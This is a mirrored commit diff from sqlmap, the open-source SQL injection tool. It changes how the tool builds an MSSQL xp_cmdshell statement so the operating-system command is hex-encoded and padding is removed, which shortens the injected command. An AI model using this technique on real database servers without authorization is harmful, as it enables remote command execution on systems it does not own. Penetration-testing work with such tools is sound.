mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-26 05:31:04 +03:00 
			
		
		
		
	hexencoding the command is much shorter than unescaping with CHAR() for MSSQL, also no need for spaces between nested comments when forging the xp_cmdshell command to run
This commit is contained in:
		
							parent
							
								
									ff9e97a42c
								
							
						
					
					
						commit
						18be319d13
					
				|  | @ -14,6 +14,7 @@ from lib.core.common import popValue | ||||||
| from lib.core.common import randomStr | from lib.core.common import randomStr | ||||||
| from lib.core.common import readInput | from lib.core.common import readInput | ||||||
| from lib.core.common import wasLastRequestDelayed | from lib.core.common import wasLastRequestDelayed | ||||||
|  | from lib.core.convert import hexencode | ||||||
| from lib.core.data import conf | from lib.core.data import conf | ||||||
| from lib.core.data import kb | from lib.core.data import kb | ||||||
| from lib.core.data import logger | from lib.core.data import logger | ||||||
|  | @ -148,9 +149,9 @@ class xp_cmdshell: | ||||||
| 
 | 
 | ||||||
|     def xpCmdshellForgeCmd(self, cmd): |     def xpCmdshellForgeCmd(self, cmd): | ||||||
|         self.__randStr = randomStr(lowercase=True) |         self.__randStr = randomStr(lowercase=True) | ||||||
|         self.__cmd = unescaper.unescape("'%s'" % cmd) |         self.__cmd = "0x%s" % hexencode(cmd) | ||||||
|         self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr |         self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr | ||||||
|         self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd) |         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd) | ||||||
|         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) |         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr) | ||||||
| 
 | 
 | ||||||
|         return self.__forgedCmd |         return self.__forgedCmd | ||||||
|  |  | ||||||
		Loading…
	
		Reference in New Issue
	
	Block a user